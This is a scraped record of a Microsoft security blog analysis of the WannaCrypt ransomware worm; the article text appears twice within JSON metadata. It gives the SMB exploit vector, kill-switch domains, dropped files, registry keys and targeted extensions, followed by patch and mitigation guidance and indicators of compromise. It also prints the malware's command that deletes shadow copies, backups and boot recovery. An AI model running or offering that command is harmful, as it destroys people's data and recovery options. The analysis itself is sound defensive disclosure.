For example, if a file is named _picture.jpg_, the ransomware encrypts and renames the file to _picture.jpg.WNCRY_.\n\nThis ransomware also creates the file _@Please_Read_Me@.txt_ in every folder where files are encrypted. The file contains the same ransom message shown in the replaced wallpaper image (see screenshot below).\n\nAfter completing the encryption process, the malware deletes the volume shadow copies by running the following command:\n\n_cmd.exe /c vssadmin delete shadows /all /quiet &amp; wmic shadowcopy delete &amp; bcdedit /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no &amp; wbadmin delete catalog -quiet_\n\nIt then replaces the desktop background image with the following message:\n\n[![wannacrypt-ransom-note](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png>)\n\nIt also runs an executable showing a ransom note which indicates a $300 ransom in Bitcoins as well as a timer:\n\n[![wannacrypt-ransom-executable](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png>)\n\nThe text is localized into the following languages: Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, and Vietnamese.\n\nThe ransomware also demonstrates the decryption capability by allowing the user to decrypt a few random files, free of charge. 
It then quickly reminds the user to pay the ransom to decrypt all the remaining files.\n\n[![wannacrypt-decryptor](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png>)\n\n## Spreading capability\n\nThe worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host, which can be observed by SecOps personnel, as shown below.\n\n[![wannacrypt-exploit](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png>)\n\nThe Internet scanning routine randomly generates octets to form the IPv4 address. The malware then targets that IP to attempt to exploit CVE-2017-0145. The threat avoids infecting the IPv4 address if the randomly generated value for first octet is 127 or if the value is equal to or greater than 224, in order to skip local loopback interfaces. Once a vulnerable machine is found and infected, it becomes the next hop to infect other machines. 
The vicious infection cycle continues as the scanning routine discovers unpatched computers.\n\nWhen it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that seems to have been copied from the public backdoor known as DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.\n\n[![wannacrypt7](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png>)\n\n[![wannacrypt8](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png>)\n\n## Protection against the WannaCrypt attack\n\nTo get the latest protection from Microsoft, upgrade to [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>). Keeping your computers [up-to-date](<https://www.microsoft.com/en-us/security/portal/mmpc/help/updatefaqs.aspx>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows.\n\nWe recommend customers that have not yet installed the security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) do so as soon as possible. 
Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\n[Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects this threat as [Ransom:Win32/WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>) as of the _1.243.297.0_ update. Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nUse [Office 365 Advanced Threat Protection](<https://blogs.office.com/2015/04/08/introducing-exchange-online-advanced-threat-protection/>), which has machine learning capability that blocks dangerous email threats, such as the emails carrying ransomware.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 
x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nCustomer guidance for WannaCrypt attacks: <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\n## Indicators of compromise\n\nSHA1 of samples analyzed:\n\n * 51e4307093f8ca8854359c0ac882ddca427a813c\n * e889544aff85ffaf8b0d0da705105dee7c97fe26\n\nFiles created:\n\n * %SystemRoot%\\mssecsvc.exe\n * %SystemRoot%\\tasksche.exe\n * %SystemRoot%\\qeriuwjhrf\n * b.wnry\n * c.wnry\n * f.wnry\n * r.wnry\n * s.wnry\n * t.wnry\n * u.wnry\n * taskdl.exe\n * taskse.exe\n * 00000000.eky\n * 00000000.res\n * 00000000.pky\n * @WanaDecryptor@.exe\n * @Please_Read_Me@.txt\n * m.vbs\n * @WanaDecryptor@.exe.lnk\n * @WanaDecryptor@.bmp\n * 274901494632976.bat\n * taskdl.exe\n * Taskse.exe\n * Files with \".wnry\" extension\n * Files with \".WNCRY\" extension\n\nRegistry keys created:\n\n * HKLM\\SOFTWARE\\WanaCrypt0r\\wd\n\n \n\n \n\n_Karthik Selvaraj, Elia Florio, Andrea Lelli, and Tanmay Ganacharya ([@tanmayg](<https://twitter.com/tanmayg>))_ \n_Microsoft Malware Protection Center ([@msftmmpc](<https://twitter.com/msftmmpc>))_\n\n \n\nRelated blog entries:\n\n[Windows 10 Creators 
Update provides next-gen ransomware protection](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)\n\n[Analysis of the ETERNALBLUE and ETERNALROMANCE exploits leaked by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\n\n \n\nUpdates:\n\nJune 20, 2017 - added reference to analysis of exploits leaked by Shadow Brokers", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", "id": "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "lastseen": "2017-06-30T15:02:20", "modified": "2017-05-13T06:40:39", "objectVersion": "1.4", "published": "2017-05-13T06:40:39", "references": [], "reporter": "msft-mmpc", "title": "WannaCrypt ransomware worm targets out-of-date systems", "type": "mmpc", "viewCount": 0}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-06-30T15:02:20"}], "modified": "2017-05-13T06:40:39", "lastseen": "2017-09-15T09:08:41", "published": "2017-05-13T06:40:39", "description": "_(Note: Read our latest comprehensive report on ransomware: _[**_Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene_**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>)_.)_\n\n \n\nOn May 12, 2017 we detected a new ransomware that spreads like a worm by leveraging vulnerabilities that have been previously fixed. While security updates are automatically applied in most computers, some users and enterprises may delay deployment of patches. 
Unfortunately, the ransomware, known as [WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>), appears to have affected computers that have not applied the patch for these vulnerabilities. While the attack is unfolding, we remind users to install [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) if they have not already done so.\n\nMicrosoft antimalware telemetry immediately picked up signs of this campaign. Our expert systems gave us visibility and context into this new attack as it happened, allowing [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) to deliver real-time defense. Through automated analysis, machine learning, and predictive modeling, we were able to rapidly protect against this malware.\n\nIn this blog, we provide an early analysis of the end-to-end ransomware attack. Please note this threat is still under investigation. The attack is still active, and there is a possibility that the attacker will attempt to react to our detection response.\n\n## Attack vector\n\nRansomware threats do not typically spread rapidly. Threats like WannaCrypt (also known as WannaCry, WanaCrypt0r, WCrypt, or WCRY) usually leverage social engineering or email as primary attack vector, relying on users downloading and executing a malicious payload. However, in this unique case, the ransomware perpetrators used publicly available exploit code for the patched SMB \"[EternalBlue](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\" vulnerability, [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which can be triggered by sending a specially crafted packet to a targeted SMBv1 server. 
This vulnerability was fixed in security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), which was released on March 14, 2017.\n\nWannaCrypt\u2019s spreading mechanism is borrowed from [well-known](<https://packetstormsecurity.com/files/142464/MS17-010-SMBv1-SrvOs2FeaToNt-OOB-Remote-Code-Execution.html>) [public SMB exploits](<https://github.com/RiskSense-Ops/MS17-010>), which armed this regular ransomware with worm-like functionalities, creating an entry vector for machines still unpatched even after the fix had become available.\n\nThe exploit code used by WannaCrypt was designed to work only against unpatched Windows 7 and Windows Server 2008 (or earlier OS) systems, so [Windows 10 PCs are not affected by this attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\nWe haven\u2019t found evidence of the exact initial entry vector used by this threat, but there are two scenarios that we believe are highly possible explanations for the spread of this ransomware:\n\n * Arrival through social engineering emails designed to trick users to run the malware and activate the worm-spreading functionality with the SMB exploit\n * Infection through SMB exploit when an unpatched computer is addressable from other infected machines\n\n## Dropper\n\nThe threat arrives as a dropper Trojan that has the following two components:\n\n 1. A component that attempts to exploit the SMB CVE-2017-0145 vulnerability in other computers\n 2. 
The ransomware known as WannaCrypt\n\nThe dropper tries to connect to the following domains using the _API InternetOpenUrlA()_:\n\n * www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[.]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[x].iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]test\n\nIf the connection to the domains is successful, the dropper does not infect the system further with ransomware or try to exploit other systems to spread; it simply stops execution. However, if the connection fails, the threat proceeds to drop the ransomware and creates a service on the system.\n\nIn other words, unlike in most malware infections, **IT Administrators should NOT block these domains**. Note that the malware is not proxy-aware, so a local DNS record may be required. This does not need to point to the Internet, but can resolve to any accessible server which will accept connections on TCP 80.\n\n[![wannacrypt1](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png>)[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt1.png>)\n\nThe threat creates a service named _mssecsvc2.0_, whose function is to exploit the SMB vulnerability in other computers accessible from the infected system:\n\n_Service Name: mssecsvc2.0_ \n_Service Description: (Microsoft Security Center (2.0) Service)_ \n_Service Parameters: \u201c-m security\u201d_\n\n[![wannacrypt2](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png>)\n\n## WannaCrypt ransomware\n\nThe ransomware component is a dropper that contains a password-protected .zip archive in its resource section. The document encryption routine and the files in the .zip archive contain support tools, a decryption tool, and the ransom message. 
In the samples we analyzed, the password for the .zip archive is \"WNcry@2ol7\".\n\nWhen run, WannaCrypt creates the following registry keys:\n\n * _HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\\\&lt;random string&gt; = \"&lt;malware working directory&gt;\\tasksche.exe\"_\n * _HKLM\\SOFTWARE\\WanaCrypt0r\\\\\\wd = \"&lt;malware working directory&gt;\"_\n\nIt changes the wallpaper to a ransom message by modifying the following registry key:\n\n * _HKCU\\Control Panel\\Desktop\\Wallpaper: \"&lt;malware working directory&gt;\\@WanaDecryptor@.bmp\"_\n\nIt creates the following files in the malware's working directory:\n\n * _00000000.eky_\n * _00000000.pky_\n * _00000000.res_\n * _274901494632976.bat_\n * _@Please_Read_Me@.txt_\n * _@WanaDecryptor@.bmp_\n * _@WanaDecryptor@.exe_\n * _b.wnry_\n * _c.wnry_\n * _f.wnry_\n * _m.vbs_\n * _msg\\m_bulgarian.wnry_\n * _msg\\m_chinese (simplified).wnry_\n * _msg\\m_chinese (traditional).wnry_\n * _msg\\m_croatian.wnry_\n * _msg\\m_czech.wnry_\n * _msg\\m_danish.wnry_\n * _msg\\m_dutch.wnry_\n * _msg\\m_english.wnry_\n * _msg\\m_filipino.wnry_\n * _msg\\m_finnish.wnry_\n * _msg\\m_french.wnry_\n * _msg\\m_german.wnry_\n * _msg\\m_greek.wnry_\n * _msg\\m_indonesian.wnry_\n * _msg\\m_italian.wnry_\n * _msg\\m_japanese.wnry_\n * _msg\\m_korean.wnry_\n * _msg\\m_latvian.wnry_\n * _msg\\m_norwegian.wnry_\n * _msg\\m_polish.wnry_\n * _msg\\m_portuguese.wnry_\n * _msg\\m_romanian.wnry_\n * _msg\\m_russian.wnry_\n * _msg\\m_slovak.wnry_\n * _msg\\m_spanish.wnry_\n * _msg\\m_swedish.wnry_\n * _msg\\m_turkish.wnry_\n * _msg\\m_vietnamese.wnry_\n * _r.wnry_\n * _s.wnry_\n * _t.wnry_\n * _TaskData\\Tor\\libeay32.dll_\n * _TaskData\\Tor\\libevent-2-0-5.dll_\n * _TaskData\\Tor\\libevent_core-2-0-5.dll_\n * _TaskData\\Tor\\libevent_extra-2-0-5.dll_\n * _TaskData\\Tor\\libgcc_s_sjlj-1.dll_\n * _TaskData\\Tor\\libssp-0.dll_\n * _TaskData\\Tor\\ssleay32.dll_\n * _TaskData\\Tor\\taskhsvc.exe_\n * _TaskData\\Tor\\tor.exe_\n * 
_TaskData\\Tor\\zlib1.dll_\n * _taskdl.exe_\n * _taskse.exe_\n * _u.wnry_\n\nWannaCrypt may also create the following files:\n\n * _%SystemRoot%\\tasksche.exe_\n * _%SystemDrive%\\intel\\&lt;random directory name&gt;\\tasksche.exe_\n * _%ProgramData%\\&lt;random directory name&gt;\\tasksche.exe_\n\nIt may create a randomly named service that has the following associated ImagePath: _\"cmd.exe /c \"&lt;malware working directory&gt;\\tasksche.exe\"\"_.\n\nIt then searches the whole computer for any file with any of the following file name extensions: _.123, .jpeg , .rb , .602 , .jpg , .rtf , .doc , .js , .sch , .3dm , .jsp , .sh , .3ds , .key , .sldm , .3g2 , .lay , .sldm , .3gp , .lay6 , .sldx , .7z , .ldf , .slk , .accdb , .m3u , .sln , .aes , .m4u , .snt , .ai , .max , .sql , .ARC , .mdb , .sqlite3 , .asc , .mdf , .sqlitedb , .asf , .mid , .stc , .asm , .mkv , .std , .asp , .mml , .sti , .avi , .mov , .stw , .backup , .mp3 , .suo , .bak , .mp4 , .svg , .bat , .mpeg , .swf , .bmp , .mpg , .sxc , .brd , .msg , .sxd , .bz2 , .myd , .sxi , .c , .myi , .sxm , .cgm , .nef , .sxw , .class , .odb , .tar , .cmd , .odg , .tbk , .cpp , .odp , .tgz , .crt , .ods , .tif , .cs , .odt , .tiff , .csr , .onetoc2 , .txt , .csv , .ost , .uop , .db , .otg , .uot , .dbf , .otp , .vb , .dch , .ots , .vbs , .der\" , .ott , .vcd , .dif , .p12 , .vdi , .dip , .PAQ , .vmdk , .djvu , .pas , .vmx , .docb , .pdf , .vob , .docm , .pem , .vsd , .docx , .pfx , .vsdx , .dot , .php , .wav , .dotm , .pl , .wb2 , .dotx , .png , .wk1 , .dwg , .pot , .wks , .edb , .potm , .wma , .eml , .potx , .wmv , .fla , .ppam , .xlc , .flv , .pps , .xlm , .frm , .ppsm , .xls , .gif , .ppsx , .xlsb , .gpg , .ppt , .xlsm , .gz , .pptm , .xlsx , .h , .pptx , .xlt , .hwp , .ps1 , .xltm , .ibd , .psd , .xltx , .iso , .pst , .xlw , .jar , .rar , .zip , .java , .raw._\n\nWannaCrypt encrypts all files it finds and renames them by appending _.WNCRY_ to the file name. 
For example, if a file is named _picture.jpg_, the ransomware encrypts and renames the file to _picture.jpg.WNCRY_.\n\nThis ransomware also creates the file _@Please_Read_Me@.txt_ in every folder where files are encrypted. The file contains the same ransom message shown in the replaced wallpaper image (see screenshot below).\n\nAfter completing the encryption process, the malware deletes the volume shadow copies by running the following command:\n\n_cmd.exe /c vssadmin delete shadows /all /quiet &amp; wmic shadowcopy delete &amp; bcdedit /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no &amp; wbadmin delete catalog -quiet_\n\nIt then replaces the desktop background image with the following message:\n\n[![wannacrypt-ransom-note](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png>)\n\nIt also runs an executable showing a ransom note which indicates a $300 ransom in Bitcoins as well as a timer:\n\n[![wannacrypt-ransom-executable](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png>)\n\nThe text is localized into the following languages: Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, and Vietnamese.\n\nThe ransomware also demonstrates the decryption capability by allowing the user to decrypt a few random files, free of charge. 
It then quickly reminds the user to pay the ransom to decrypt all the remaining files.\n\n[![wannacrypt-decryptor](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png>)\n\n## Spreading capability\n\nThe worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host, which can be observed by SecOps personnel, as shown below.\n\n[![wannacrypt-exploit](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png>)\n\nThe Internet scanning routine randomly generates octets to form the IPv4 address. The malware then targets that IP to attempt to exploit CVE-2017-0145. The threat avoids infecting the IPv4 address if the randomly generated value for first octet is 127 or if the value is equal to or greater than 224, in order to skip local loopback interfaces. Once a vulnerable machine is found and infected, it becomes the next hop to infect other machines. 
The vicious infection cycle continues as the scanning routine discovers unpatched computers.\n\nWhen it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that seems to have been copied from the public backdoor known as DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.\n\n[![wannacrypt7](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png>)\n\n[![wannacrypt8](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png>)\n\n## Protection against the WannaCrypt attack\n\nTo get the latest protection from Microsoft, upgrade to [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>). Keeping your computers [up-to-date](<https://www.microsoft.com/en-us/security/portal/mmpc/help/updatefaqs.aspx>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows.\n\nWe recommend customers that have not yet installed the security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) do so as soon as possible. 
Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\n[Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects this threat as [Ransom:Win32/WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>) as of the _1.243.297.0_ update. Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nUse [Office 365 Advanced Threat Protection](<https://blogs.office.com/2015/04/08/introducing-exchange-online-advanced-threat-protection/>), which has machine learning capability that blocks dangerous email threats, such as the emails carrying ransomware.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 
x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nCustomer guidance for WannaCrypt attacks: <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\n## Indicators of compromise\n\nSHA1 of samples analyzed:\n\n * 51e4307093f8ca8854359c0ac882ddca427a813c\n * e889544aff85ffaf8b0d0da705105dee7c97fe26\n\nFiles created:\n\n * %SystemRoot%\\mssecsvc.exe\n * %SystemRoot%\\tasksche.exe\n * %SystemRoot%\\qeriuwjhrf\n * b.wnry\n * c.wnry\n * f.wnry\n * r.wnry\n * s.wnry\n * t.wnry\n * u.wnry\n * taskdl.exe\n * taskse.exe\n * 00000000.eky\n * 00000000.res\n * 00000000.pky\n * @WanaDecryptor@.exe\n * @Please_Read_Me@.txt\n * m.vbs\n * @WanaDecryptor@.exe.lnk\n * @WanaDecryptor@.bmp\n * 274901494632976.bat\n * taskdl.exe\n * Taskse.exe\n * Files with \".wnry\" extension\n * Files with \".WNCRY\" extension\n\nRegistry keys created:\n\n * HKLM\\SOFTWARE\\WanaCrypt0r\\wd\n\n \n\n \n\n_Karthik Selvaraj, Elia Florio, Andrea Lelli, and Tanmay Ganacharya ([@tanmayg](<https://twitter.com/tanmayg>))_ \n_Microsoft Malware Protection Center ([@msftmmpc](<https://twitter.com/msftmmpc>))_\n\n \n\nRelated blog entries:\n\n[Windows 10 Creators 
